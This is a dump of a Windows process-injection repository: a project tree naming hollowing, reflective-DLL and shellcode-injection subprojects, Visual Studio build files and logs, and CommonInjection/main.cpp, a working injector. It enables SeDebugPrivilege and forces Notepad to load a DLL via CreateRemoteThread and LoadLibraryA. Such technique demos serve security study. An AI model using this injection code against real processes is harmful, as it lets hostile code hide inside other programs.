├── .gitignore
├── .vs
└── ProcessInjection
│ └── v14
│ └── .suo
├── CommonInjection
├── CommonInjection.vcxproj
├── CommonInjection.vcxproj.filters
├── CommonInjection.vcxproj.user
├── Debug
│ ├── CommonInjection.log
│ ├── CommonInjection.tlog
│ │ ├── CL.command.1.tlog
│ │ ├── CL.read.1.tlog
│ │ ├── CL.write.1.tlog
│ │ ├── CommonInjection.lastbuildstate
│ │ ├── link.command.1.tlog
│ │ ├── link.read.1.tlog
│ │ └── link.write.1.tlog
│ ├── main.obj.enc
│ ├── vc140.idb
│ └── vc140.pdb
├── Release
│ ├── CommonInjection.log
│ ├── CommonInjection.tlog
│ │ ├── CL.command.1.tlog
│ │ ├── CL.read.1.tlog
│ │ ├── CL.write.1.tlog
│ │ ├── CommonInjection.lastbuildstate
│ │ ├── link.command.1.tlog
│ │ ├── link.read.1.tlog
│ │ └── link.write.1.tlog
│ └── vc140.pdb
├── main.cpp
└── x64
│ ├── Debug
│ └── CommonInjection.log
│ └── Release
│ └── CommonInjection.log
├── DLLTest
├── DLLTest.cpp
├── DLLTest.vcxproj
├── DLLTest.vcxproj.filters
├── Debug
│ ├── DLLTest.Build.CppClean.log
│ └── DLLTest.log
├── InjectionDLL.h
├── ReadMe.txt
├── stdafx.cpp
├── stdafx.h
├── targetver.h
└── x64
│ ├── Debug
│ └── DLLTest.log
│ └── Release
│ └── DLLTest.log
├── EXEPayload
├── Debug
│ └── EXEPayload.log
├── EXEPayload.vcxproj
├── EXEPayload.vcxproj.filters
├── main.cpp
├── main.h
└── x64
│ └── Debug
│ └── EXEPayload.log
├── Gargoyle
├── Gargoyle.cpp
├── Gargoyle.vcxproj
├── Gargoyle.vcxproj.filters
├── ReadMe.txt
├── gadget.nasm
├── setup.nasm
└── stdafx.h
├── HollowingDropper
├── Debug
│ └── HollowingDropper.log
├── HollowingDropper.vcxproj
├── HollowingDropper.vcxproj.filters
├── HollowingProcess.cpp
├── PE.cpp
├── PE.h
├── main.cpp
├── stdafx.h
└── x64
│ └── Debug
│ └── HollowingDropper.log
├── Images
├── PE - Copy.jpg
└── PEB.jpg
├── InjectionDLL
├── Debug
│ ├── InjectionDLL.Build.CppClean.log
│ └── InjectionDLL.log
├── InjectionDLL.cpp
├── InjectionDLL.def
├── InjectionDLL.h
├── InjectionDLL.vcxproj
├── InjectionDLL.vcxproj.filters
├── InjectionDLL.vcxproj.user
├── ReadMe.txt
├── dllmain.cpp
├── stdafx.cpp
├── stdafx.h
├── targetver.h
└── x64
│ ├── Debug
│ └── InjectionDLL.log
│ └── Release
│ └── InjectionDLL.log
├── LICENSE
├── MEMORY MODULE
├── .vs
│ └── MEMORY MODULE
│ │ └── v14
│ │ └── .suo
├── Debug
│ ├── MEMORY MODULE.log
│ └── MEMORY MODULE.tlog
│ │ └── unsuccessfulbuild
├── Loader.c
├── Loader.h
├── MEMORY MODULE.vcxproj
├── MEMORY MODULE.vcxproj.filters
├── MoudleMain.cpp
└── x64
│ └── Debug
│ └── MEMORY MODULE.log
├── MemroyInjectionDLL
├── Debug
│ └── MemroyInjectionDLL.log
├── MemroyInjectionDLL.cpp
├── MemroyInjectionDLL.h
├── MemroyInjectionDLL.vcxproj
├── MemroyInjectionDLL.vcxproj.filters
├── ReadMe.txt
├── dllmain.cpp
├── stdafx.cpp
├── stdafx.h
├── targetver.h
└── x64
│ └── Debug
│ └── MemroyInjectionDLL.log
├── ProcessInjection.VC.db
├── ProcessInjection.sln
├── README.md
├── ReflectiveDLL
├── Debug
│ ├── ReflectiveDLL.log
│ ├── ReflectiveDLL.tlog
│ │ ├── CL.command.1.tlog
│ │ ├── CL.read.1.tlog
│ │ ├── CL.write.1.tlog
│ │ ├── ReflectiveDLL.lastbuildstate
│ │ └── unsuccessfulbuild
│ ├── vc140.idb
│ └── vc140.pdb
├── ReadMe.txt
├── ReflectiveDLL.cpp
├── ReflectiveDLL.def
├── ReflectiveDLL.vcxproj
├── ReflectiveDLL.vcxproj.filters
├── ReflectiveLoader.h
├── dllmain.cpp
├── stdafx.cpp
├── stdafx.h
├── targetver.h
└── x64
│ ├── Debug
│ ├── ReflectiveDLL.Build.CppClean.log
│ ├── ReflectiveDLL.log
│ ├── ReflectiveDLL.tlog
│ │ ├── CL.command.1.tlog
│ │ ├── CL.read.1.tlog
│ │ ├── CL.write.1.tlog
│ │ ├── ReflectiveDLL.lastbuildstate
│ │ ├── ReflectiveDLL.write.1u.tlog
│ │ ├── link.command.1.tlog
│ │ ├── link.read.1.tlog
│ │ └── link.write.1.tlog
│ ├── vc140.idb
│ └── vc140.pdb
│ └── Release
│ └── ReflectiveDLL.log
├── ReflectiveDLLInjection
├── .vs
│ └── ReflectiveDLLInjection
│ │ └── v14
│ │ └── .suo
├── Debug
│ └── ReflectiveDLLInjection.log
├── LoadRemoteLibraryR.cpp
├── LoadRemoteLibraryR.h
├── ReadMe.txt
├── ReflectiveDLLInjection.cpp
├── ReflectiveDLLInjection.h
├── ReflectiveDLLInjection.vcxproj
├── ReflectiveDLLInjection.vcxproj.filters
├── ReflectiveDLLInjection.vcxproj.user
├── stdafx.cpp
├── stdafx.h
├── targetver.h
└── x64
│ ├── Debug
│ ├── ReflectiveDLLInjection.Build.CppClean.log
│ └── ReflectiveDLLInjection.log
│ └── Release
│ └── ReflectiveDLLInjection.log
├── ReflectiveDLLPEForm
├── ReflectiveDLLPEForm.vcxproj
├── ReflectiveDLLPEForm.vcxproj.filters
├── ReflectiveDemo.cpp
├── ReflectiveLoader.c
├── ReflectiveLoader.h
└── x64
│ ├── Debug
│ ├── Reflecti.3AD41A2B.tlog
│ │ └── unsuccessfulbuild
│ └── ReflectiveDLLPEForm.log
│ └── Release
│ └── ReflectiveDLLPEForm.log
└── ShellcodeInjection
├── ShellcodeInjection.vcxproj
├── ShellcodeInjection.vcxproj.filters
└── main.cpp
/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 | ##
4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
5 |
6 | # User-specific files
7 | *.suo
8 | *.user
9 | *.userosscache
10 | *.sln.docstates
11 |
12 | # User-specific files (MonoDevelop/Xamarin Studio)
13 | *.userprefs
14 |
15 | # Build results
16 | [Dd]ebug/
17 | [Dd]ebugPublic/
18 | [Rr]elease/
19 | [Rr]eleases/
20 | x64/
21 | x86/
22 | bld/
23 | [Bb]in/
24 | [Oo]bj/
25 | [Ll]og/
26 |
27 | # Visual Studio 2015 cache/options directory
28 | .vs/
29 | # Uncomment if you have tasks that create the project's static files in wwwroot
30 | #wwwroot/
31 |
32 | # MSTest test Results
33 | [Tt]est[Rr]esult*/
34 | [Bb]uild[Ll]og.*
35 |
36 | # NUNIT
37 | *.VisualState.xml
38 | TestResult.xml
39 |
40 | # Build Results of an ATL Project
41 | [Dd]ebugPS/
42 | [Rr]eleasePS/
43 | dlldata.c
44 |
45 | # .NET Core
46 | project.lock.json
47 | project.fragment.lock.json
48 | artifacts/
49 | **/Properties/launchSettings.json
50 |
51 | *_i.c
52 | *_p.c
53 | *_i.h
54 | *.ilk
55 | *.meta
56 | *.obj
57 | *.pch
58 | *.pdb
59 | *.pgc
60 | *.pgd
61 | *.rsp
62 | *.sbr
63 | *.tlb
64 | *.tli
65 | *.tlh
66 | *.tmp
67 | *.tmp_proj
68 | *.log
69 | *.vspscc
70 | *.vssscc
71 | .builds
72 | *.pidb
73 | *.svclog
74 | *.scc
75 |
76 | # Chutzpah Test files
77 | _Chutzpah*
78 |
79 | # Visual C++ cache files
80 | ipch/
81 | *.aps
82 | *.ncb
83 | *.opendb
84 | *.opensdf
85 | *.sdf
86 | *.cachefile
87 | *.VC.db
88 | *.VC.VC.opendb
89 |
90 | # Visual Studio profiler
91 | *.psess
92 | *.vsp
93 | *.vspx
94 | *.sap
95 |
96 | # TFS 2012 Local Workspace
97 | $tf/
98 |
99 | # Guidance Automation Toolkit
100 | *.gpState
101 |
102 | # ReSharper is a .NET coding add-in
103 | _ReSharper*/
104 | *.[Rr]e[Ss]harper
105 | *.DotSettings.user
106 |
107 | # JustCode is a .NET coding add-in
108 | .JustCode
109 |
110 | # TeamCity is a build add-in
111 | _TeamCity*
112 |
113 | # DotCover is a Code Coverage Tool
114 | *.dotCover
115 |
116 | # Visual Studio code coverage results
117 | *.coverage
118 | *.coveragexml
119 |
120 | # NCrunch
121 | _NCrunch_*
122 | .*crunch*.local.xml
123 | nCrunchTemp_*
124 |
125 | # MightyMoose
126 | *.mm.*
127 | AutoTest.Net/
128 |
129 | # Web workbench (sass)
130 | .sass-cache/
131 |
132 | # Installshield output folder
133 | [Ee]xpress/
134 |
135 | # DocProject is a documentation generator add-in
136 | DocProject/buildhelp/
137 | DocProject/Help/*.HxT
138 | DocProject/Help/*.HxC
139 | DocProject/Help/*.hhc
140 | DocProject/Help/*.hhk
141 | DocProject/Help/*.hhp
142 | DocProject/Help/Html2
143 | DocProject/Help/html
144 |
145 | # Click-Once directory
146 | publish/
147 |
148 | # Publish Web Output
149 | *.[Pp]ublish.xml
150 | *.azurePubxml
151 | # TODO: Comment the next line if you want to checkin your web deploy settings
152 | # but database connection strings (with potential passwords) will be unencrypted
153 | *.pubxml
154 | *.publishproj
155 |
156 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
157 | # checkin your Azure Web App publish settings, but sensitive information contained
158 | # in these scripts will be unencrypted
159 | PublishScripts/
160 |
161 | # NuGet Packages
162 | *.nupkg
163 | # The packages folder can be ignored because of Package Restore
164 | **/packages/*
165 | # except build/, which is used as an MSBuild target.
166 | !**/packages/build/
167 | # Uncomment if necessary however generally it will be regenerated when needed
168 | #!**/packages/repositories.config
169 | # NuGet v3's project.json files produces more ignorable files
170 | *.nuget.props
171 | *.nuget.targets
172 |
173 | # Microsoft Azure Build Output
174 | csx/
175 | *.build.csdef
176 |
177 | # Microsoft Azure Emulator
178 | ecf/
179 | rcf/
180 |
181 | # Windows Store app package directories and files
182 | AppPackages/
183 | BundleArtifacts/
184 | Package.StoreAssociation.xml
185 | _pkginfo.txt
186 |
187 | # Visual Studio cache files
188 | # files ending in .cache can be ignored
189 | *.[Cc]ache
190 | # but keep track of directories ending in .cache
191 | !*.[Cc]ache/
192 |
193 | # Others
194 | ClientBin/
195 | ~$*
196 | *~
197 | *.dbmdl
198 | *.dbproj.schemaview
199 | *.jfm
200 | *.pfx
201 | *.publishsettings
202 | orleans.codegen.cs
203 |
204 | # Since there are multiple workflows, uncomment next line to ignore bower_components
205 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
206 | #bower_components/
207 |
208 | # RIA/Silverlight projects
209 | Generated_Code/
210 |
211 | # Backup & report files from converting an old project file
212 | # to a newer Visual Studio version. Backup files are not needed,
213 | # because we have git ;-)
214 | _UpgradeReport_Files/
215 | Backup*/
216 | UpgradeLog*.XML
217 | UpgradeLog*.htm
218 |
219 | # SQL Server files
220 | *.mdf
221 | *.ldf
222 | *.ndf
223 |
224 | # Business Intelligence projects
225 | *.rdl.data
226 | *.bim.layout
227 | *.bim_*.settings
228 |
229 | # Microsoft Fakes
230 | FakesAssemblies/
231 |
232 | # GhostDoc plugin setting file
233 | *.GhostDoc.xml
234 |
235 | # Node.js Tools for Visual Studio
236 | .ntvs_analysis.dat
237 | node_modules/
238 |
239 | # Typescript v1 declaration files
240 | typings/
241 |
242 | # Visual Studio 6 build log
243 | *.plg
244 |
245 | # Visual Studio 6 workspace options file
246 | *.opt
247 |
248 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
249 | *.vbw
250 |
251 | # Visual Studio LightSwitch build output
252 | **/*.HTMLClient/GeneratedArtifacts
253 | **/*.DesktopClient/GeneratedArtifacts
254 | **/*.DesktopClient/ModelManifest.xml
255 | **/*.Server/GeneratedArtifacts
256 | **/*.Server/ModelManifest.xml
257 | _Pvt_Extensions
258 |
259 | # Paket dependency manager
260 | .paket/paket.exe
261 | paket-files/
262 |
263 | # FAKE - F# Make
264 | .fake/
265 |
266 | # JetBrains Rider
267 | .idea/
268 | *.sln.iml
269 |
270 | # CodeRush
271 | .cr/
272 |
273 | # Python Tools for Visual Studio (PTVS)
274 | __pycache__/
275 | *.pyc
276 |
277 | # Cake - Uncomment if you are using it
278 | # tools/**
279 | # !tools/packages.config
280 |
281 | # Telerik's JustMock configuration file
282 | *.jmconfig
283 |
284 | # BizTalk build output
285 | *.btp.cs
286 | *.btm.cs
287 | *.odx.cs
288 | *.xsd.cs
289 |
--------------------------------------------------------------------------------
/.vs/ProcessInjection/v14/.suo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/.vs/ProcessInjection/v14/.suo
--------------------------------------------------------------------------------
/CommonInjection/CommonInjection.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {D605C71D-D52F-4629-9020-4A7C04455FAB}
23 | Win32Proj
24 | CommonInjection
25 | 8.1
26 |
27 |
28 |
29 | Application
30 | true
31 | v140
32 | Unicode
33 |
34 |
35 | Application
36 | false
37 | v140
38 | true
39 | Unicode
40 |
41 |
42 | Application
43 | true
44 | v140
45 | Unicode
46 |
47 |
48 | Application
49 | false
50 | v140
51 | true
52 | Unicode
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 | true
74 | C:\Program Files %28x86%29\Windows Kits\10\Include\10.0.10150.0\ucrt;$(IncludePath)
75 | C:\Program Files %28x86%29\Windows Kits\10\Lib\10.0.10150.0\ucrt\x86;$(LibraryPath)
76 |
77 |
78 | true
79 |
80 |
81 | false
82 | $(VC_IncludePath);$(WindowsSDK_IncludePath);C:\Program Files %28x86%29\Windows Kits\10\Include\10.0.10150.0\ucrt;$(IncludePath)
83 | C:\Program Files %28x86%29\Windows Kits\10\Lib\10.0.10150.0\ucrt\x86;$(LibraryPath);$(VC_LibraryPath_x86);$(WindowsSDK_LibraryPath_x86)
84 |
85 |
86 | false
87 |
88 |
89 |
90 | NotUsing
91 | Level3
92 | Disabled
93 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
94 | true
95 |
96 |
97 | Console
98 | true
99 |
100 |
101 |
102 |
103 |
104 |
105 | Level3
106 | Disabled
107 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
108 | true
109 |
110 |
111 | Console
112 | true
113 |
114 |
115 |
116 |
117 | Level3
118 |
119 |
120 | MaxSpeed
121 | true
122 | true
123 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
124 | true
125 |
126 |
127 | Console
128 | true
129 | true
130 | true
131 |
132 |
133 |
134 |
135 | Level3
136 |
137 |
138 | MaxSpeed
139 | true
140 | true
141 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
142 | true
143 |
144 |
145 | Console
146 | true
147 | true
148 | true
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
157 |
--------------------------------------------------------------------------------
/CommonInjection/CommonInjection.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Resource Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/CommonInjection/CommonInjection.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/CommonInjection/Debug/CommonInjection.log:
--------------------------------------------------------------------------------
1 | CommonInjection.vcxproj -> d:\users\sudo\documents\visual studio 2015\Projects\ProcessInjection\Debug\CommonInjection.exe
2 | CommonInjection.vcxproj -> d:\users\sudo\documents\visual studio 2015\Projects\ProcessInjection\Debug\CommonInjection.pdb (Full PDB)
3 |
--------------------------------------------------------------------------------
/CommonInjection/Debug/CommonInjection.tlog/CL.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/CommonInjection/Debug/CommonInjection.tlog/CL.command.1.tlog
--------------------------------------------------------------------------------
/CommonInjection/Debug/CommonInjection.tlog/CL.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/CommonInjection/Debug/CommonInjection.tlog/CL.read.1.tlog
--------------------------------------------------------------------------------
/CommonInjection/Debug/CommonInjection.tlog/CL.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/CommonInjection/Debug/CommonInjection.tlog/CL.write.1.tlog
--------------------------------------------------------------------------------
/CommonInjection/Debug/CommonInjection.tlog/CommonInjection.lastbuildstate:
--------------------------------------------------------------------------------
1 | #TargetFrameworkVersion=v4.0:PlatformToolSet=v140:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=8.1
2 | Debug|Win32|d:\users\sudo\documents\visual studio 2015\Projects\ProcessInjection\|
3 |
--------------------------------------------------------------------------------
/CommonInjection/Debug/CommonInjection.tlog/link.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/CommonInjection/Debug/CommonInjection.tlog/link.command.1.tlog
--------------------------------------------------------------------------------
/CommonInjection/Debug/CommonInjection.tlog/link.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/CommonInjection/Debug/CommonInjection.tlog/link.read.1.tlog
--------------------------------------------------------------------------------
/CommonInjection/Debug/CommonInjection.tlog/link.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/CommonInjection/Debug/CommonInjection.tlog/link.write.1.tlog
--------------------------------------------------------------------------------
/CommonInjection/Debug/main.obj.enc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/CommonInjection/Debug/main.obj.enc
--------------------------------------------------------------------------------
/CommonInjection/Debug/vc140.idb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/CommonInjection/Debug/vc140.idb
--------------------------------------------------------------------------------
/CommonInjection/Debug/vc140.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/CommonInjection/Debug/vc140.pdb
--------------------------------------------------------------------------------
/CommonInjection/Release/CommonInjection.log:
--------------------------------------------------------------------------------
1 | Generating code
2 | All 2 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
3 | Finished generating code
4 | CommonInjection.vcxproj -> d:\users\sudo\documents\visual studio 2015\Projects\ProcessInjection\Release\CommonInjection.exe
5 | CommonInjection.vcxproj -> d:\users\sudo\documents\visual studio 2015\Projects\ProcessInjection\Release\CommonInjection.pdb (Full PDB)
6 |
--------------------------------------------------------------------------------
/CommonInjection/Release/CommonInjection.tlog/CL.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/CommonInjection/Release/CommonInjection.tlog/CL.command.1.tlog
--------------------------------------------------------------------------------
/CommonInjection/Release/CommonInjection.tlog/CL.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/CommonInjection/Release/CommonInjection.tlog/CL.read.1.tlog
--------------------------------------------------------------------------------
/CommonInjection/Release/CommonInjection.tlog/CL.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/CommonInjection/Release/CommonInjection.tlog/CL.write.1.tlog
--------------------------------------------------------------------------------
/CommonInjection/Release/CommonInjection.tlog/CommonInjection.lastbuildstate:
--------------------------------------------------------------------------------
1 | #TargetFrameworkVersion=v4.0:PlatformToolSet=v140:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=8.1
2 | Release|Win32|d:\users\sudo\documents\visual studio 2015\Projects\ProcessInjection\|
3 |
--------------------------------------------------------------------------------
/CommonInjection/Release/CommonInjection.tlog/link.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/CommonInjection/Release/CommonInjection.tlog/link.command.1.tlog
--------------------------------------------------------------------------------
/CommonInjection/Release/CommonInjection.tlog/link.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/CommonInjection/Release/CommonInjection.tlog/link.read.1.tlog
--------------------------------------------------------------------------------
/CommonInjection/Release/CommonInjection.tlog/link.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/CommonInjection/Release/CommonInjection.tlog/link.write.1.tlog
--------------------------------------------------------------------------------
/CommonInjection/Release/vc140.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/CommonInjection/Release/vc140.pdb
--------------------------------------------------------------------------------
/CommonInjection/main.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | using namespace std;
5 |
6 | void PrivilegeEscalation();
7 | HANDLE GetThePidOfTargetProcess();
8 | BOOL DoInjection(char *InjectionDllPath, HANDLE injectionProcessHandle);
9 | int main()
10 | {
11 | char InjectionDllPath[] = { "D:\\InjectionDLL.dll" };
12 | //Get the pid of notepad.exe which is to be injected.
13 | HANDLE injectionProcessHandle = GetThePidOfTargetProcess();
14 | if (injectionProcessHandle == 0)
15 | {
16 |
17 | cout << "Can't Get The PID" << endl;
18 | }
19 | //Privilege Escalation
20 | PrivilegeEscalation();
21 | if (DoInjection(InjectionDllPath, injectionProcessHandle))
22 | {
23 | cout << "Injection Success" << endl;
24 | }
25 | else
26 | {
27 | cout << "Inject Failed!" << endl;
28 | }
29 | system("pause");
30 | }
31 |
32 | HANDLE GetThePidOfTargetProcess()
33 | {
34 |
35 | //Get the pid of the process which to be injected.
36 | HWND injectionProcessHwnd = FindWindowA(0, "Untitled - Notepad");
37 | DWORD dwInjectionProcessID;
38 | GetWindowThreadProcessId(injectionProcessHwnd, &dwInjectionProcessID);
39 | cout << "Notepad's pid -> " << dwInjectionProcessID << endl;
40 | HANDLE injectionProcessHandle = ::OpenProcess(PROCESS_ALL_ACCESS | PROCESS_CREATE_THREAD, 0, dwInjectionProcessID);//dwInjectionProcessID);
41 | return injectionProcessHandle;
42 | }
43 |
44 | void PrivilegeEscalation()
45 | {
46 |
47 | HANDLE hToken;
48 | LUID luid;
49 | TOKEN_PRIVILEGES tp;
50 | OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken);
51 | LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid);
52 | tp.PrivilegeCount = 1;
53 | tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
54 | tp.Privileges[0].Luid = luid;
55 | AdjustTokenPrivileges(hToken, 0, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL);
56 | }
57 | BOOL DoInjection(char *InjectionDllPath,HANDLE injectionProcessHandle)
58 | {
59 | DWORD injBufSize = lstrlen((LPCWSTR)InjectionDllPath) + 1;
60 | LPVOID AllocAddr = VirtualAllocEx(injectionProcessHandle, NULL, injBufSize, MEM_COMMIT, PAGE_READWRITE);
61 | if (AllocAddr == 0)
62 | {
63 | cout << "Alloc memory failed!" << endl;
64 | }
65 | else
66 | cout << "Alloc Memory success!" << endl;
67 | WriteProcessMemory(injectionProcessHandle, AllocAddr, (void*)InjectionDllPath, injBufSize, NULL);
68 | DWORD ER = GetLastError();
69 | PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryA");
70 | cout << "The LoadLibrary's Address is:" << pfnStartAddr << endl;
71 | HANDLE hRemoteThread;
72 | if ((hRemoteThread = CreateRemoteThread(injectionProcessHandle, NULL, 0, pfnStartAddr, AllocAddr, 0, NULL)) == NULL)
73 | {
74 | ER = GetLastError();
75 | cout << "Create Remote Thread Failed!" << endl;
76 | return FALSE;
77 | }
78 | else
79 | {
80 | cout << "Create Remote Thread Success!" << endl;
81 | return TRUE;
82 | }
83 | }
84 |
85 |
86 |
87 |
--------------------------------------------------------------------------------
/CommonInjection/x64/Debug/CommonInjection.log:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/CommonInjection/x64/Release/CommonInjection.log:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/DLLTest/DLLTest.cpp:
--------------------------------------------------------------------------------
1 | // DLLTest.cpp : Defines the entry point for the console application.
2 | //
3 |
4 | #include "stdafx.h"
5 | #include "InjectionDLL.h"
6 | #include
7 | int main()
8 | {
9 | //Ping();
10 | HMODULE H = LoadLibraryA("InjectionDLL.dll");
11 |
12 | //FARPROC ping = GetProcAddress(H, "Ping");
13 | // ping();
14 | while (1);
15 | return 0;
16 | }
17 |
18 |
--------------------------------------------------------------------------------
/DLLTest/DLLTest.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {25F8D1B0-3C56-42EC-84AB-B4A01932DF51}
23 | Win32Proj
24 | DLLTest
25 | 8.1
26 |
27 |
28 |
29 | Application
30 | true
31 | v140
32 | Unicode
33 |
34 |
35 | Application
36 | false
37 | v140
38 | true
39 | Unicode
40 |
41 |
42 | Application
43 | true
44 | v140
45 | Unicode
46 |
47 |
48 | Application
49 | false
50 | v140
51 | true
52 | Unicode
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 | true
74 |
75 |
76 | true
77 |
78 |
79 | false
80 |
81 |
82 | false
83 |
84 |
85 |
86 | Use
87 | Level3
88 | Disabled
89 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
90 | true
91 |
92 |
93 | Console
94 | true
95 |
96 |
97 |
98 |
99 | Use
100 | Level3
101 | Disabled
102 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
103 | true
104 |
105 |
106 | Console
107 | true
108 |
109 |
110 |
111 |
112 | Level3
113 | Use
114 | MaxSpeed
115 | true
116 | true
117 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
118 | true
119 | D:\Users\sudo\Documents\visual studio 2015\Projects\ProcessInjection\Debug;%(AdditionalIncludeDirectories)
120 |
121 |
122 | Console
123 | true
124 | true
125 | true
126 | D:\Users\sudo\Documents\visual studio 2015\Projects\ProcessInjection\Debug
127 | InjectionDLL.lib;%(AdditionalDependencies)
128 |
129 |
130 |
131 |
132 | Level3
133 | Use
134 | MaxSpeed
135 | true
136 | true
137 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
138 | true
139 |
140 |
141 | Console
142 | true
143 | true
144 | true
145 |
146 |
147 |
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
157 |
158 | Create
159 | Create
160 | Create
161 | Create
162 |
163 |
164 |
165 |
166 |
167 |
--------------------------------------------------------------------------------
/DLLTest/DLLTest.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 | Header Files
29 |
30 |
31 |
32 |
33 | Source Files
34 |
35 |
36 | Source Files
37 |
38 |
39 |
--------------------------------------------------------------------------------
/DLLTest/Debug/DLLTest.Build.CppClean.log:
